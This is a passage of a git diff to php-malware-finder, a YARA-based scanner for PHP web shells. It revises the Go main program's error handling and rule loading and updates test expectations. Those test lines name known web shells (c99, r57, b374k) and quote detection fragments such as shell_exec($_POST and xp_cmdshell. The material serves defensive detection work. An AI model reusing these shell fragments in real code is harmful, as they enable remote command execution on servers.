                 return nil
         }
         err := filepath.Walk(dirName, visit)
-        handleError(err, false)
+        handleError(err, "unable to complete target crawling", false)
         close(targets)
 }
 
@@ -249,18 +299,17 @@ func loadRulesFile(fileName string) (*yara.Rules, error) {
 func main() {
         startTime := time.Now()
         _, err := flags.Parse(&args)
-        handleError(err, true)
+        if err != nil {
+                os.Exit(1)
+        }
+        if args.ShowVersion {
+                println(version)
+                os.Exit(0)
+        }
 
         // check rules path
         if args.RulesDir == "" {
-                args.RulesDir = DefaultDir
-                if _, err := os.Stat(args.RulesDir); os.IsNotExist(err) {
-                        args.RulesDir, _ = os.Getwd()
-                        sigFile := path.Join(args.RulesDir, RulesFile)
-                        if _, err = os.Stat(sigFile); os.IsNotExist(err) {
-                                handleError(fmt.Errorf("no rules in %s or %s", DefaultDir, args.RulesDir), true)
-                        }
-                }
+                args.RulesDir = writeRulesFiles(data)
         }
         if args.Verbose {
                 log.Println("[DEBUG] rules directory:", args.RulesDir)
@@ -302,7 +351,7 @@ func main() {
         // load YARA rules
         rulePath := path.Join(args.RulesDir, RulesFile)
         rules, err := loadRulesFile(rulePath)
-        handleError(err, true)
+        handleError(err, "", true)
         if args.Verbose {
                 log.Println("[DEBUG] ruleset loaded:", rulePath)
         }
@@ -322,7 +371,7 @@ func main() {
 
         // scan target
         if f, err := os.Stat(args.Positional.Target); os.IsNotExist(err) {
-                handleError(err, true)
+                handleError(err, "", true)
         } else {
                 if args.Verbose {
                         log.Println("[DEBUG] scan workers:", args.Workers)
@@ -387,7 +436,7 @@ func main() {
                         var matches yara.MatchRules
                         scanner := makeScanner(rules)
                         err := scanner.SetCallback(&matches).ScanFile(args.Positional.Target)
-                        handleError(err, true)
+                        handleError(err, "unable to scan target", true)
                         for _, match := range matches {
                                 log.Println("[WARNING] match found:", args.Positional.Target, match.Rule)
                                 if args.Verbose {
@@ -405,4 +454,13 @@ func main() {
                         log.Printf("[DEBUG] scanned %d files in %s\n", scannedFilesCount, endTime.Sub(startTime).String())
                 }
         }
+
+        // delete temporary files
+        if strings.HasPrefix(args.RulesDir, tempDirPathPrefix) {
+                if args.Verbose {
+                        log.Println("[DEBUG] deleting temporary folder:", args.RulesDir)
+                }
+                err := os.RemoveAll(args.RulesDir)
+                handleError(err, "unable to delete temporary folder", true)
+        }
 }
diff --git a/php-malware-finder/tests.sh b/tests.sh
index f8c5109..a302031 100755
--- a/php-malware-finder/tests.sh
+++ b/tests.sh
@@ -1,7 +1,7 @@
 #!/bin/bash
 
-PMF=./phpmalwarefinder
-SAMPLES=./samples
+PMF=./php-malware-finder
+SAMPLES=./data/samples
 
 type yara 2>/dev/null 1>&2 || (echo "[-] Please make sure that yara is installed" && exit 1)
 
@@ -29,17 +29,17 @@ run_test classic/ajaxshell.php 'DodgyStrings'
 run_test classic/ajaxshell.php '0x23e2:$: shell_exec'
 run_test classic/ajaxshell.php "0x16e0:\$ini_get: ini_get('safe_mode"
 run_test classic/ajaxshell.php "0x17f1:\$ini_get: ini_get('open_basedir"
-run_test classic/angel.php '0x1d:$disable_magic_quotes:'
+run_test classic/angel.php '0x1b:$disable_magic_quotes:'
 run_test classic/b374k.php 'ObfuscatedPhp'
 run_test classic/b374k.php "0xe9:\$b374k: 'ev'.'al'"
 run_test classic/b374k.php '0xb3:$align: $func="cr"."eat"."e_fun"."cti"."on";$b374k=$func('
 run_test classic/b374k.php '0xd6:$align: ;$b374k=$func('
 run_test classic/b374k.php '0x43:$: github.com/b374k/b374k'
-run_test classic/sosyete.php '0x1a2d:$execution: shell_exec($_POST'
-run_test classic/simattacker.php '0x16e:$: fpassthru'
-run_test classic/r57.php '0x149da:$: xp_cmdshell'
-run_test classic/cyb3rsh3ll.php '0x23323:$udp_dos: fsockopen("udp://'
-run_test classic/c99.php '0x3d56:$eval: {exec('
+run_test classic/sosyete.php '0x194e:$execution: shell_exec($_POST'
+run_test classic/simattacker.php '0x158:$: fpassthru'
+run_test classic/r57.php '0x142a2:$: xp_cmdshell'
+run_test classic/cyb3rsh3ll.php '0x2200d:$udp_dos: fsockopen("udp://'
+run_test classic/c99.php '0x3bb4:$eval: {exec('
 run_test classic/c100.php '0x4f8d:$eval: {eval('
 
 # Obfuscated php
@@ -81,7 +81,7 @@ run_test artificial/bypasses.php "0x132:\$var_as_func: \$_POST\['funct'\]("
 # real
 run_test real/sucuri_2014_04.php '0x67:$execution3:'
 run_test real/novahot.php 'DodgyStrings'
-run_test real/guidtz.php '0x12d8:$non_printables:'
+run_test real/guidtz.php '0x286:$non_printables:'
 run_test real/ice.php 'double_var'
 run_test real/srt.php '$register_function'
 run_test real/awvjtnz.php '$reversed:'
diff --git a/php-malware-finder/utils/generate_whitelist.py b/utils/generate_whitelist.py
index dabaa21..dabaa21 100755
--- a/php-malware-finder/utils/generate_whitelist.py
+++ b/utils/generate_whitelist.py
diff --git a/php-malware-finder/utils/magento1_whitelist.sh b/utils/magento1_whitelist.sh
index a747f80..a747f80 100755
--- a/php-malware-finder/utils/magento1_whitelist.sh
+++ b/utils/magento1_whitelist.sh
diff --git a/php-malware-finder/utils/magento2_whitelist.sh b/utils/magento2_whitelist.sh
index bb742c8..bb742c8 100755
--- a/php-malware-finder/utils/magento2_whitelist.sh
+++ b/utils/magento2_whitelist.sh
diff --git a/php-malware-finder/utils/mass_whitelist.py b/utils/mass_whitelist.py
index 868f7b5..868f7b5 100755
--- a/php-malware-finder/utils/mass_whitelist.py
+++ b/utils/mass_whitelist.py